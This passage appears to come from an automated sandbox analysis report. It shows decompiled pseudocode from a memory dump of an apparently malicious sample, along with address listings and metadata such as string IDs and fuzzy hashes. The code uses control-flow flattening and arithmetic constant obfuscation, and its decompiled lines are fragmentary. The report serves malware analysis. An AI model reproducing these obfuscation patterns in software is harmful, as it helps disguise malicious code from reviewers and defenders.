                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x053e5e23;
                                                                                                                                                                                                                    				_v44 = 0xa85d21;
                                                                                                                                                                                                                    				_v44 = _v44 + 0xc059;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x00ae1a6a;
                                                                                                                                                                                                                    				_v52 = 0x8cfc93;
                                                                                                                                                                                                                    				_t425 = 0x4e;
                                                                                                                                                                                                                    				_t426 = _v160;
                                                                                                                                                                                                                    				_v52 = _v52 / _t425;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x000d7c08;
                                                                                                                                                                                                                    				_t473 = _v16;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						_t465 = 0x923670f;
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                                    								_t485 = _t476 - _t465;
                                                                                                                                                                                                                    								if(_t485 > 0) {
                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								if(_t485 == 0) {
                                                                                                                                                                                                                    									_t399 = E00A80DC5(_v28, _t465, _t426, _v72,  &_v16, _v40, _t426, _v124, _v80, _a8, _t426, _v116, _t426, _v20,  &_v8, _t426, _t412, _v132, _v100);
                                                                                                                                                                                                                    									_t483 =  &(_t483[0x11]);
                                                                                                                                                                                                                    									if(_t399 == 0) {
                                                                                                                                                                                                                    										goto L13;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_t401 = E00A773DE();
                                                                                                                                                                                                                    										_t476 = 0x77bb2fd;
                                                                                                                                                                                                                    										_v152 = _v16 * 0x2c + _t412;
                                                                                                                                                                                                                    										_t473 =  >=  ? _t412 : (_t401 & 0x0000001f) * 0x2c + _t412;
                                                                                                                                                                                                                    										goto L15;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									L32:
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t476 == 0x1ed9b36) {
                                                                                                                                                                                                                    										_t476 = 0x2c83999;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t476 == 0x2c83999) {
                                                                                                                                                                                                                    											_t389 = E00A7C6D9(0x20000);
                                                                                                                                                                                                                    											_t412 = _t389;
                                                                                                                                                                                                                    											if(_t412 != 0) {
                                                                                                                                                                                                                    												_t476 = 0xfbe85ab;
                                                                                                                                                                                                                    												goto L14;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t476 == 0x2f8c20f) {
                                                                                                                                                                                                                    												E00A6787B(_v148, _v156, _v12, _t481, _v48, _v172);
                                                                                                                                                                                                                    												_t483 =  &(_t483[4]);
                                                                                                                                                                                                                    												L13:
                                                                                                                                                                                                                    												_t476 = 0xb70e060;
                                                                                                                                                                                                                    												L14:
                                                                                                                                                                                                                    												L15:
                                                                                                                                                                                                                    												_t426 = _v160;
                                                                                                                                                                                                                    												_t465 = 0x923670f;
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												if(_t476 == 0x6aee774) {
                                                                                                                                                                                                                    													_t473 = _t473 + 0x2c;
                                                                                                                                                                                                                    													asm("sbb esi, esi");
                                                                                                                                                                                                                    													_t476 = (_t476 & 0xfc0ad29d) + 0xb70e060;
                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													if(_t476 != 0x77bb2fd) {
                                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                    														_t407 = E00A774CF(_v140, _v88, _v108, _a8,  *_t473);
                                                                                                                                                                                                                    														_t426 = _t407;
                                                                                                                                                                                                                    														_t483 =  &(_t483[3]);
                                                                                                                                                                                                                    														_v160 = _t407;
                                                                                                                                                                                                                    														_t476 =  !=  ? 0xa37c82b : 0x6aee774;
                                                                                                                                                                                                                    														goto L1;
                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								goto L31;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t476 == 0xa1bfb89) {
                                                                                                                                                                                                                    								E00A76A6B(_t412, _v104, _v36, _v44, _v52);
                                                                                                                                                                                                                    								_t483 =  &(_t483[3]);
                                                                                                                                                                                                                    								_t476 = 0xda54175;
                                                                                                                                                                                                                    								goto L29;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t476 == 0xa37c82b) {
                                                                                                                                                                                                                    									E00A65589(_v68, _t481, _v76, _v120, _t426, _v84,  &_v4, _t426, _v92, _v96);
                                                                                                                                                                                                                    									_t476 =  !=  ? 0x2f8c20f : 0x6aee774;
                                                                                                                                                                                                                    									E00A7286C(_v168, _v160, _v60, _v112);
                                                                                                                                                                                                                    									_t483 =  &(_t483[0xa]);
                                                                                                                                                                                                                    									L29:
                                                                                                                                                                                                                    									_t465 = 0x923670f;
                                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t476 == 0xb70e060) {
                                                                                                                                                                                                                    										E00A76A6B(_t481, _v24, _v128, _v56, _v32);
                                                                                                                                                                                                                    										_t483 =  &(_t483[3]);
                                                                                                                                                                                                                    										_t476 = 0xa1bfb89;
                                                                                                                                                                                                                    										goto L14;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t476 != 0xfbe85ab) {
                                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_t481 = E00A7C6D9(0x2000);
                                                                                                                                                                                                                    											_t426 = _v160;
                                                                                                                                                                                                                    											_t465 = 0x923670f;
                                                                                                                                                                                                                    											_t476 =  !=  ? 0x923670f : 0xa1bfb89;
                                                                                                                                                                                                                    											goto L3;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                                    							_t389 = _v152;
                                                                                                                                                                                                                    							_t426 = _v160;
                                                                                                                                                                                                                    						} while (_t476 != 0xda54175);
                                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                                    						return _t389;
                                                                                                                                                                                                                    						goto L32;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}








































































                                                                                                                                                                                                                    0x00a71158
                                                                                                                                                                                                                    0x00a71161
                                                                                                                                                                                                                    0x00a71168
                                                                                                                                                                                                                    0x00a7116f
                                                                                                                                                                                                                    0x00a71171
                                                                                                                                                                                                                    0x00a71176
                                                                                                                                                                                                                    0x00a71181
                                                                                                                                                                                                                    0x00a71184
                                                                                                                                                                                                                    0x00a7118b
                                                                                                                                                                                                                    0x00a71193
                                                                                                                                                                                                                    0x00a71195
                                                                                                                                                                                                                    0x00a7119d
                                                                                                                                                                                                                    0x00a711a6
                                                                                                                                                                                                                    0x00a711aa
                                                                                                                                                                                                                    0x00a711af
                                                                                                                                                                                                                    0x00a711b3
                                                                                                                                                                                                                    0x00a711c1
                                                                                                                                                                                                                    0x00a711c6
                                                                                                                                                                                                                    0x00a711ca
                                                                                                                                                                                                                    0x00a711d2
                                                                                                                                                                                                                    0x00a711da
                                                                                                                                                                                                                    0x00a711e9
                                                                                                                                                                                                                    0x00a711ec
                                                                                                                                                                                                                    0x00a711f0
                                                                                                                                                                                                                    0x00a711f8
                                                                                                                                                                                                                    0x00a71200
                                                                                                                                                                                                                    0x00a71210
                                                                                                                                                                                                                    0x00a71218
                                                                                                                                                                                                                    0x00a7121d
                                                                                                                                                                                                                    0x00a71221
                                                                                                                                                                                                                    0x00a71229
                                                                                                                                                                                                                    0x00a71231
                                                                                                                                                                                                                    0x00a71239
                                                                                                                                                                                                                    0x00a71246
                                                                                                                                                                                                                    0x00a7124c
                                                                                                                                                                                                                    0x00a71254
                                                                                                                                                                                                                    0x00a7125c
                                                                                                                                                                                                                    0x00a71268
                                                                                                                                                                                                                    0x00a7126d
                                                                                                                                                                                                                    0x00a71273
                                                                                                                                                                                                                    0x00a7127b
                                                                                                                                                                                                                    0x00a71288
                                                                                                                                                                                                                    0x00a71289
                                                                                                                                                                                                                    0x00a71293
                                                                                                                                                                                                                    0x00a71297
                                                                                                                                                                                                                    0x00a7129f
                                                                                                                                                                                                                    0x00a712aa
                                                                                                                                                                                                                    0x00a712b7
                                                                                                                                                                                                                    0x00a712c2
                                                                                                                                                                                                                    0x00a712d0
                                                                                                                                                                                                                    0x00a712d5
                                                                                                                                                                                                                    0x00a712db
                                                                                                                                                                                                                    0x00a712e3
                                                                                                                                                                                                                    0x00a712ee
                                                                                                                                                                                                                    0x00a712f9
                                                                                                                                                                                                                    0x00a71304
                                                                                                                                                                                                                    0x00a7130c
                                                                                                                                                                                                                    0x00a71316
                                                                                                                                                                                                                    0x00a71319
                                                                                                                                                                                                                    0x00a7131d
                                                                                                                                                                                                                    0x00a71325
                                                                                                                                                                                                                    0x00a7132d
                                                                                                                                                                                                                    0x00a71335
                                                                                                                                                                                                                    0x00a7133d
                                                                                                                                                                                                                    0x00a7134d
                                                                                                                                                                                                                    0x00a71355
                                                                                                                                                                                                                    0x00a7135a
                                                                                                                                                                                                                    0x00a71360
                                                                                                                                                                                                                    0x00a71368
                                                                                                                                                                                                                    0x00a71373
                                                                                                                                                                                                                    0x00a7137e
                                                                                                                                                                                                                    0x00a71389
                                                                                                                                                                                                                    0x00a71391
                                                                                                                                                                                                                    0x00a7139e
                                                                                                                                                                                                                    0x00a7139f
                                                                                                                                                                                                                    0x00a713a3
                                                                                                                                                                                                                    0x00a713ab
                                                                                                                                                                                                                    0x00a713b3
                                                                                                                                                                                                                    0x00a713bb
                                                                                                                                                                                                                    0x00a713c3
                                                                                                                                                                                                                    0x00a713ce
                                                                                                                                                                                                                    0x00a713d9
                                                                                                                                                                                                                    0x00a713e4
                                                                                                                                                                                                                    0x00a713ec
                                                                                                                                                                                                                    0x00a713f4
                                                                                                                                                                                                                    0x00a713fc
                                                                                                                                                                                                                    0x00a71404
                                                                                                                                                                                                                    0x00a7140c
                                                                                                                                                                                                                    0x00a71414
                                                                                                                                                                                                                    0x00a7141c
                                                                                                                                                                                                                    0x00a71424
                                                                                                                                                                                                                    0x00a7142c
                                                                                                                                                                                                                    0x00a71434
                                                                                                                                                                                                                    0x00a7143c
                                                                                                                                                                                                                    0x00a71441
                                                                                                                                                                                                                    0x00a71449
                                                                                                                                                                                                                    0x00a71451
                                                                                                                                                                                                                    0x00a71459
                                                                                                                                                                                                                    0x00a71461
                                                                                                                                                                                                                    0x00a71469
                                                                                                                                                                                                                    0x00a71471
                                                                                                                                                                                                                    0x00a71479
                                                                                                                                                                                                                    0x00a71481
                                                                                                                                                                                                                    0x00a7148e
                                                                                                                                                                                                                    0x00a71492
                                                                                                                                                                                                                    0x00a7149a
                                                                                                                                                                                                                    0x00a714a8
                                                                                                                                                                                                                    0x00a714b4
                                                                                                                                                                                                                    0x00a714b9
                                                                                                                                                                                                                    0x00a714bf
                                                                                                                                                                                                                    0x00a714c7
                                                                                                                                                                                                                    0x00a714cf
                                                                                                                                                                                                                    0x00a714e2
                                                                                                                                                                                                                    0x00a714e5
                                                                                                                                                                                                                    0x00a714ec
                                                                                                                                                                                                                    0x00a714f7
                                                                                                                                                                                                                    0x00a714ff
                                                                                                                                                                                                                    0x00a71507
                                                                                                                                                                                                                    0x00a7150c
                                                                                                                                                                                                                    0x00a71514
                                                                                                                                                                                                                    0x00a7151c
                                                                                                                                                                                                                    0x00a71524
                                                                                                                                                                                                                    0x00a71529
                                                                                                                                                                                                                    0x00a71531
                                                                                                                                                                                                                    0x00a71539
                                                                                                                                                                                                                    0x00a71541
                                                                                                                                                                                                                    0x00a71549
                                                                                                                                                                                                                    0x00a71551
                                                                                                                                                                                                                    0x00a71559
                                                                                                                                                                                                                    0x00a7156f
                                                                                                                                                                                                                    0x00a71576
                                                                                                                                                                                                                    0x00a71581
                                                                                                                                                                                                                    0x00a7158c
                                                                                                                                                                                                                    0x00a71597
                                                                                                                                                                                                                    0x00a715a2
                                                                                                                                                                                                                    0x00a715aa
                                                                                                                                                                                                                    0x00a715b2
                                                                                                                                                                                                                    0x00a715ba
                                                                                                                                                                                                                    0x00a715c2
                                                                                                                                                                                                                    0x00a715cd
                                                                                                                                                                                                                    0x00a715d8
                                                                                                                                                                                                                    0x00a715e3
                                                                                                                                                                                                                    0x00a715ee
                                                                                                                                                                                                                    0x00a715f6
                                                                                                                                                                                                                    0x00a71601
                                                                                                                                                                                                                    0x00a71609
                                                                                                                                                                                                                    0x00a71611
                                                                                                                                                                                                                    0x00a71616
                                                                                                                                                                                                                    0x00a7161e
                                                                                                                                                                                                                    0x00a71629
                                                                                                                                                                                                                    0x00a71631
                                                                                                                                                                                                                    0x00a7163c
                                                                                                                                                                                                                    0x00a71647
                                                                                                                                                                                                                    0x00a71652
                                                                                                                                                                                                                    0x00a7165d
                                                                                                                                                                                                                    0x00a7166f
                                                                                                                                                                                                                    0x00a71672
                                                                                                                                                                                                                    0x00a71676
                                                                                                                                                                                                                    0x00a7167d
                                                                                                                                                                                                                    0x00a71688
                                                                                                                                                                                                                    0x00a7168f
                                                                                                                                                                                                                    0x00a7168f
                                                                                                                                                                                                                    0x00a71693
                                                                                                                                                                                                                    0x00a71693
                                                                                                                                                                                                                    0x00a71698
                                                                                                                                                                                                                    0x00a71698
                                                                                                                                                                                                                    0x00a71698
                                                                                                                                                                                                                    0x00a71698
                                                                                                                                                                                                                    0x00a7169a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a716a0
                                                                                                                                                                                                                    0x00a717d9
                                                                                                                                                                                                                    0x00a717de
                                                                                                                                                                                                                    0x00a717e3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a717e9
                                                                                                                                                                                                                    0x00a717f0
                                                                                                                                                                                                                    0x00a717f8
                                                                                                                                                                                                                    0x00a7180e
                                                                                                                                                                                                                    0x00a71812
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71812
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a716a6
                                                                                                                                                                                                                    0x00a716ac
                                                                                                                                                                                                                    0x00a7177f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a716b2
                                                                                                                                                                                                                    0x00a716b8
                                                                                                                                                                                                                    0x00a71768
                                                                                                                                                                                                                    0x00a7176d
                                                                                                                                                                                                                    0x00a71772
                                                                                                                                                                                                                    0x00a71778
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71778
                                                                                                                                                                                                                    0x00a716be
                                                                                                                                                                                                                    0x00a716c4
                                                                                                                                                                                                                    0x00a71741
                                                                                                                                                                                                                    0x00a71746
                                                                                                                                                                                                                    0x00a71749
                                                                                                                                                                                                                    0x00a71749
                                                                                                                                                                                                                    0x00a7174e
                                                                                                                                                                                                                    0x00a71752
                                                                                                                                                                                                                    0x00a71752
                                                                                                                                                                                                                    0x00a71693
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a716c6
                                                                                                                                                                                                                    0x00a716cc
                                                                                                                                                                                                                    0x00a7170e
                                                                                                                                                                                                                    0x00a71713
                                                                                                                                                                                                                    0x00a7171b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a716ce
                                                                                                                                                                                                                    0x00a716d4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a716da
                                                                                                                                                                                                                    0x00a716ef
                                                                                                                                                                                                                    0x00a716f4
                                                                                                                                                                                                                    0x00a716f6
                                                                                                                                                                                                                    0x00a716fb
                                                                                                                                                                                                                    0x00a71709
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71709
                                                                                                                                                                                                                    0x00a716d4
                                                                                                                                                                                                                    0x00a716cc
                                                                                                                                                                                                                    0x00a716c4
                                                                                                                                                                                                                    0x00a716b8
                                                                                                                                                                                                                    0x00a716ac
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a716a0
                                                                                                                                                                                                                    0x00a71820
                                                                                                                                                                                                                    0x00a71917
                                                                                                                                                                                                                    0x00a7191c
                                                                                                                                                                                                                    0x00a7191f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71826
                                                                                                                                                                                                                    0x00a7182d
                                                                                                                                                                                                                    0x00a718cb
                                                                                                                                                                                                                    0x00a718ef
                                                                                                                                                                                                                    0x00a718f2
                                                                                                                                                                                                                    0x00a718f7
                                                                                                                                                                                                                    0x00a71924
                                                                                                                                                                                                                    0x00a71924
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7182f
                                                                                                                                                                                                                    0x00a71835
                                                                                                                                                                                                                    0x00a7188f
                                                                                                                                                                                                                    0x00a71894
                                                                                                                                                                                                                    0x00a71897
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71837
                                                                                                                                                                                                                    0x00a7183d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71843
                                                                                                                                                                                                                    0x00a71855
                                                                                                                                                                                                                    0x00a71863
                                                                                                                                                                                                                    0x00a71867
                                                                                                                                                                                                                    0x00a7186c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7186c
                                                                                                                                                                                                                    0x00a7183d
                                                                                                                                                                                                                    0x00a71835
                                                                                                                                                                                                                    0x00a7182d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71929
                                                                                                                                                                                                                    0x00a71929
                                                                                                                                                                                                                    0x00a7192d
                                                                                                                                                                                                                    0x00a71931
                                                                                                                                                                                                                    0x00a71947
                                                                                                                                                                                                                    0x00a71947
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a71947
                                                                                                                                                                                                                    0x00a71693

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: F+$?Z&$'\$*g)$8@$:r$D>E$I)$Lt$`$j$uh1$}@J$;
                                                                                                                                                                                                                    • API String ID: 0-3730375157
                                                                                                                                                                                                                    • Opcode ID: 168714e46339d31617a121514b3d3fd8f3ab450c45f98ec44441e9d23a9460ab
                                                                                                                                                                                                                    • Instruction ID: 49950806ac75eaa84feb93e50c237b6978a5a01b00909fd222c5635a581ec78e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 168714e46339d31617a121514b3d3fd8f3ab450c45f98ec44441e9d23a9460ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0122472A08380DFD368CF25C98AA5BBBE2FBC4744F10891DF59996260D7B58949CF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A64D6B(signed int __ecx) {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				char _v1040;
                                                                                                                                                                                                                    				char _v1560;
                                                                                                                                                                                                                    				char _v2080;
                                                                                                                                                                                                                    				char _v2600;
                                                                                                                                                                                                                    				signed int _v2604;
                                                                                                                                                                                                                    				signed int _v2608;
                                                                                                                                                                                                                    				signed int _v2612;
                                                                                                                                                                                                                    				signed int _v2616;
                                                                                                                                                                                                                    				signed int _v2620;
                                                                                                                                                                                                                    				signed int _v2624;
                                                                                                                                                                                                                    				signed int _v2628;
                                                                                                                                                                                                                    				signed int _v2632;
                                                                                                                                                                                                                    				signed int _v2636;
                                                                                                                                                                                                                    				signed int _v2640;
                                                                                                                                                                                                                    				signed int _v2644;
                                                                                                                                                                                                                    				signed int _v2648;
                                                                                                                                                                                                                    				signed int _v2652;
                                                                                                                                                                                                                    				signed int _v2656;
                                                                                                                                                                                                                    				signed int _v2660;
                                                                                                                                                                                                                    				signed int _v2664;
                                                                                                                                                                                                                    				signed int _v2668;
                                                                                                                                                                                                                    				signed int _v2672;
                                                                                                                                                                                                                    				signed int _v2676;
                                                                                                                                                                                                                    				signed int _v2680;
                                                                                                                                                                                                                    				signed int _v2684;
                                                                                                                                                                                                                    				signed int _v2688;
                                                                                                                                                                                                                    				signed int _v2692;
                                                                                                                                                                                                                    				signed int _v2696;
                                                                                                                                                                                                                    				signed int _v2700;
                                                                                                                                                                                                                    				signed int _v2704;
                                                                                                                                                                                                                    				signed int _v2708;
                                                                                                                                                                                                                    				signed int _v2712;
                                                                                                                                                                                                                    				signed int _v2716;
                                                                                                                                                                                                                    				signed int _v2720;
                                                                                                                                                                                                                    				signed int _v2724;
                                                                                                                                                                                                                    				signed int _v2728;
                                                                                                                                                                                                                    				signed int _v2732;
                                                                                                                                                                                                                    				signed int _v2736;
                                                                                                                                                                                                                    				signed int _v2740;
                                                                                                                                                                                                                    				signed int _v2744;
                                                                                                                                                                                                                    				signed int _v2748;
                                                                                                                                                                                                                    				signed int _v2752;
                                                                                                                                                                                                                    				signed int _v2756;
                                                                                                                                                                                                                    				signed int _v2760;
                                                                                                                                                                                                                    				signed int _v2764;
                                                                                                                                                                                                                    				signed int _v2768;
                                                                                                                                                                                                                    				signed int _v2772;
                                                                                                                                                                                                                    				signed int _t427;
                                                                                                                                                                                                                    				signed int _t450;
                                                                                                                                                                                                                    				signed int _t453;
                                                                                                                                                                                                                    				signed int _t454;
                                                                                                                                                                                                                    				signed int _t455;
                                                                                                                                                                                                                    				signed int _t456;
                                                                                                                                                                                                                    				signed int _t457;
                                                                                                                                                                                                                    				signed int _t458;
                                                                                                                                                                                                                    				signed int _t459;
                                                                                                                                                                                                                    				signed int _t460;
                                                                                                                                                                                                                    				signed int _t507;
                                                                                                                                                                                                                    				void* _t508;
                                                                                                                                                                                                                    				signed int* _t512;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t512 =  &_v2772;
                                                                                                                                                                                                                    				_v2712 = 0x3423b6;
                                                                                                                                                                                                                    				_v2712 = _v2712 + 0xffff852b;
                                                                                                                                                                                                                    				_v2712 = _v2712 | 0x2c54d39e;
                                                                                                                                                                                                                    				_v2712 = _v2712 ^ 0x2c77fbd6;
                                                                                                                                                                                                                    				_v2728 = 0xeb1bf3;
                                                                                                                                                                                                                    				_v2728 = _v2728 + 0xffff24d3;
                                                                                                                                                                                                                    				_v2728 = _v2728 + 0xffff0b60;
                                                                                                                                                                                                                    				_v2728 = _v2728 * 0x6c;
                                                                                                                                                                                                                    				_t507 = __ecx;
                                                                                                                                                                                                                    				_v2728 = _v2728 ^ 0x626befef;
                                                                                                                                                                                                                    				_t508 = 0x9400104;
                                                                                                                                                                                                                    				_v2768 = 0xd618a;
                                                                                                                                                                                                                    				_v2768 = _v2768 << 7;
                                                                                                                                                                                                                    				_v2768 = _v2768 + 0x7351;
                                                                                                                                                                                                                    				_t453 = 0x51;
                                                                                                                                                                                                                    				_v2768 = _v2768 / _t453;
                                                                                                                                                                                                                    				_v2768 = _v2768 ^ 0x001def4c;
                                                                                                                                                                                                                    				_v2704 = 0x803ec9;
                                                                                                                                                                                                                    				_v2704 = _v2704 >> 0xd;
                                                                                                                                                                                                                    				_t454 = 0x35;
                                                                                                                                                                                                                    				_v2704 = _v2704 / _t454;
                                                                                                                                                                                                                    				_v2704 = _v2704 ^ 0x000c006f;
                                                                                                                                                                                                                    				_v2700 = 0xdbe045;
                                                                                                                                                                                                                    				_v2700 = _v2700 >> 0xd;
                                                                                                                                                                                                                    				_v2700 = _v2700 | 0x79b671c6;
                                                                                                                                                                                                                    				_v2700 = _v2700 ^ 0x79b6a971;
                                                                                                                                                                                                                    				_v2604 = 0xdb8e48;
                                                                                                                                                                                                                    				_t455 = 0x2f;
                                                                                                                                                                                                                    				_v2604 = _v2604 / _t455;
                                                                                                                                                                                                                    				_v2604 = _v2604 ^ 0x0002a7e3;
                                                                                                                                                                                                                    				_v2644 = 0xbd4782;
                                                                                                                                                                                                                    				_t456 = 0x5e;
                                                                                                                                                                                                                    				_v2644 = _v2644 / _t456;
                                                                                                                                                                                                                    				_v2644 = _v2644 ^ 0x0001c164;
                                                                                                                                                                                                                    				_v2696 = 0xcefaf7;
                                                                                                                                                                                                                    				_v2696 = _v2696 >> 0xb;
                                                                                                                                                                                                                    				_v2696 = _v2696 * 0x46;
                                                                                                                                                                                                                    				_v2696 = _v2696 ^ 0x00080616;
                                                                                                                                                                                                                    				_v2760 = 0x207c7;
                                                                                                                                                                                                                    				_v2760 = _v2760 | 0x0e3775f6;
                                                                                                                                                                                                                    				_v2760 = _v2760 << 0xe;
                                                                                                                                                                                                                    				_v2760 = _v2760 + 0xffff90bf;
                                                                                                                                                                                                                    				_v2760 = _v2760 ^ 0xddfbc962;
                                                                                                                                                                                                                    				_v2680 = 0xad03c7;
                                                                                                                                                                                                                    				_v2680 = _v2680 + 0xffff0c8b;
                                                                                                                                                                                                                    				_v2680 = _v2680 + 0xffff9fa8;
                                                                                                                                                                                                                    				_v2680 = _v2680 ^ 0x00aac66c;
                                                                                                                                                                                                                    				_v2608 = 0x4a361f;
                                                                                                                                                                                                                    				_v2608 = _v2608 << 6;
                                                                                                                                                                                                                    				_v2608 = _v2608 ^ 0x12839547;
                                                                                                                                                                                                                    				_v2752 = 0xabec42;
                                                                                                                                                                                                                    				_v2752 = _v2752 >> 2;
                                                                                                                                                                                                                    				_v2752 = _v2752 | 0xf77eee5f;
                                                                                                                                                                                                                    				_v2752 = _v2752 ^ 0xf77c2fb4;
                                                                                                                                                                                                                    				_v2736 = 0x53cd5d;
                                                                                                                                                                                                                    				_v2736 = _v2736 ^ 0x9a41bf61;
                                                                                                                                                                                                                    				_v2736 = _v2736 | 0xdb2d12f2;
                                                                                                                                                                                                                    				_t450 = 0xf;
                                                                                                                                                                                                                    				_v2736 = _v2736 / _t450;
                                                                                                                                                                                                                    				_v2736 = _v2736 ^ 0x0e96f14a;
                                                                                                                                                                                                                    				_v2656 = 0xb80d34;
                                                                                                                                                                                                                    				_v2656 = _v2656 >> 7;
                                                                                                                                                                                                                    				_v2656 = _v2656 ^ 0x000de3d1;
                                                                                                                                                                                                                    				_v2616 = 0x439866;
                                                                                                                                                                                                                    				_v2616 = _v2616 + 0xa1e9;
                                                                                                                                                                                                                    				_v2616 = _v2616 ^ 0x0049ca36;
                                                                                                                                                                                                                    				_v2744 = 0x197869;
                                                                                                                                                                                                                    				_v2744 = _v2744 << 8;
                                                                                                                                                                                                                    				_v2744 = _v2744 | 0x91ca2d70;
                                                                                                                                                                                                                    				_t457 = 0x11;
                                                                                                                                                                                                                    				_v2744 = _v2744 * 0x31;
                                                                                                                                                                                                                    				_v2744 = _v2744 ^ 0x78e5e525;
                                                                                                                                                                                                                    				_v2720 = 0x6a2a42;
                                                                                                                                                                                                                    				_v2720 = _v2720 ^ 0x283d70f8;
                                                                                                                                                                                                                    				_v2720 = _v2720 * 0x3c;
                                                                                                                                                                                                                    				_v2720 = _v2720 + 0xc532;
                                                                                                                                                                                                                    				_v2720 = _v2720 ^ 0x7473c6ea;
                                                                                                                                                                                                                    				_v2636 = 0xf7c436;
                                                                                                                                                                                                                    				_v2636 = _v2636 + 0xd50e;
                                                                                                                                                                                                                    				_v2636 = _v2636 ^ 0x00fe77c5;
                                                                                                                                                                                                                    				_v2672 = 0x438051;
                                                                                                                                                                                                                    				_v2672 = _v2672 / _t457;
                                                                                                                                                                                                                    				_v2672 = _v2672 >> 9;
                                                                                                                                                                                                                    				_v2672 = _v2672 ^ 0x000a36df;
                                                                                                                                                                                                                    				_v2688 = 0x2c5643;
                                                                                                                                                                                                                    				_v2688 = _v2688 >> 0xf;
                                                                                                                                                                                                                    				_v2688 = _v2688 ^ 0x7d6ed76a;
                                                                                                                                                                                                                    				_v2688 = _v2688 ^ 0x7d6b4140;
                                                                                                                                                                                                                    				_v2664 = 0x1bdb03;
                                                                                                                                                                                                                    				_v2664 = _v2664 + 0x11db;
                                                                                                                                                                                                                    				_t458 = 0x24;
                                                                                                                                                                                                                    				_v2664 = _v2664 / _t458;
                                                                                                                                                                                                                    				_v2664 = _v2664 ^ 0x00043e33;
                                                                                                                                                                                                                    				_v2620 = 0x16bf8d;
                                                                                                                                                                                                                    				_v2620 = _v2620 / _t450;
                                                                                                                                                                                                                    				_v2620 = _v2620 ^ 0x00050740;
                                                                                                                                                                                                                    				_v2612 = 0xa01b3;
                                                                                                                                                                                                                    				_v2612 = _v2612 << 4;
                                                                                                                                                                                                                    				_v2612 = _v2612 ^ 0x00a4edb1;
                                                                                                                                                                                                                    				_v2628 = 0xf1f938;
                                                                                                                                                                                                                    				_v2628 = _v2628 + 0x6fb;
                                                                                                                                                                                                                    				_v2628 = _v2628 ^ 0x00fa4399;
                                                                                                                                                                                                                    				_v2684 = 0xe094c2;
                                                                                                                                                                                                                    				_v2684 = _v2684 + 0x30bf;
                                                                                                                                                                                                                    				_v2684 = _v2684 * 9;
                                                                                                                                                                                                                    				_v2684 = _v2684 ^ 0x07e1a6d3;
                                                                                                                                                                                                                    				_v2692 = 0xf1bf54;
